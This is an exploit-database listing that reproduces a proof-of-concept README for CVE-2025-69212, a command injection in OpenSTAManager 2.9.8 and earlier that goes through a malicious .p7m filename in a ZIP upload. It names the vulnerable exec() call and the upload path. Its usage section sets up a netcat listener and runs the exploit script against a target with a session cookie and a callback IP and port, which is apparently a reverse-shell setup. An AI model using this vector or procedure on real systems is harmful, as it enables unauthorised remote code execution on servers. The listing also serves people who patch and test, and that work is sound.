Exploit for OS Command Injection in Devcode Openstamanager CVE-2025-69212

Name: Exploit for OS Command Injection in Devcode Openstamanager CVE-2025-69212
Rating: 5 (7 reviews)

2026-06-27 | CVSS 9.4

## https://sploitus.com/exploit?id=46CC1A3B-E288-5D6F-BB8A-C0B2ECAF3AD9
# CVE-2025-69212 — OpenSTAManager P7M Command Injection PoC

OpenSTAManager <= 2.9.8 — OS Command Injection via malicious .p7m filename in ZIP upload.

**File:** `src/Util/XML.php:100` — unsanitized `$file` in `exec()`  
**Vector:** `/plugins/importFE_ZIP/actions.php` → ZIP → `.p7m` filename → `exec("openssl smime ... -in \"$file\" ...")`

## Usage

```bash
# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444
```

## References
- https://github.com/advisories/GHSA-25fp-8w8p-mx36
- https://nvd.nist.gov/vuln/detail/CVE-2025-69212
# CVE-2025-69212-PoC